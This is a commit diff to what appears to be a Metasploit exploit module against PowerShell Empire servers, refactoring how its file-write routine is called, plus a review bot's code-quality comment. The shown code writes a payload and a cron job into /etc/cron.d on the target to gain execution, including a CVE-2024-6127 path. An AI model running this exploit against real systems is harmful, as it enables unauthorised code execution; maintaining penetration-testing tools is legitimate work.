
Commit 5ee8696

committed
Pass a Hash as argument
1 parent bff7e48 commit 5ee8696


1 file changed

+12
-11
lines changed


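--- a/modules/exploits/linux/http/empire_skywalker.rb
+++ b/modules/exploits/linux/http/empire_skywalker.rb
@@ -180,7 +180,13 @@ def get_staging_key
 staging_key
 end
 
-def write_file(path, data, session_id, session_key, server_epoch)
+def write_file(path, data, session_id, session_key, opts)
+if datastore['CVE'] == 'CVE-2024-6127'
+write_file_cve_2024_6127(path, data, session_id, session_key, opts[:staging_key])
+return
+end
+server_epoch = opts[:server_epoch]
+
 # target_url.path default traffic profile for empire agent communication
 # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50
 data = create_packet(
@@ -267,6 +273,7 @@ def exploit
 fail_with(Failure::Unknown, "Failed to communicate with STAGE2") unless res and res.code == 200
 aes_decrypt(session_key, res.body)
 
+opts = { staging_key: staging_key }
 log_path = "/var/lib/powershell-empire/empire/server/downloads/#{session_id}/agent.log"
 
 else
@@ -289,6 +296,8 @@ def exploit
 server_epoch = body[0..9].to_i
 session_key = body[10..-1]
 print_good('Successfully negotiated an artificial Empire agent')
+
+opts = { server_epoch: server_epoch }
 log_path = '/agent.log'
 
 end
@@ -308,20 +317,12 @@ def exploit
 end
 
 print_status("Writing payload to #{payload_path}")
-if datastore['CVE'] == 'CVE-2024-6127'
-write_file_cve_2024_6127(payload_path, payload_data, session_id, session_key, staging_key)
-else
-write_file(payload_path, payload_data, session_id, session_key, server_epoch)
-end
+write_file(payload_path, payload_data, session_id, session_key, opts)
 
 cron_path = '/etc/cron.d/' + rand_text_alpha(8)
 print_status("Writing cron job to #{cron_path}")
 
-if datastore['CVE'] == 'CVE-2024-6127'
-write_file_cve_2024_6127(cron_path, cron_file(cron_command), session_id, session_key, staging_key)
-else
-write_file(cron_path, cron_file(cron_command), session_id, session_key, server_epoch)
-end
+write_file(cron_path, cron_file(cron_command), session_id, session_key, opts)
 print_status("Waiting for cron job to run, can take up to 60 seconds")
 
 register_files_for_cleanup(cron_path)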
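Review bot: In `write_file`, `opts[:staging_key]` and `opts[:server_epoch]` evaluate to nil when the key is absent, so if the `datastore['CVE']` check there ever disagrees with the branch in `exploit` that built `opts`, a nil is passed on silently instead of failing at the point of the mismatch. Reading the values with `opts.fetch(:staging_key)` and `server_epoch = opts.fetch(:server_epoch)` would raise a KeyError as soon as the two conditions drift apart. A short comment above the method, for example `# opts: { staging_key: } for CVE-2024-6127, otherwise { server_epoch: }`, would document which key each path expects. Both `write_file` and `exploit` continue outside the visible hunks, so the condition guarding the two `opts` assignments is inferred from the `else` shown at new line 279.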
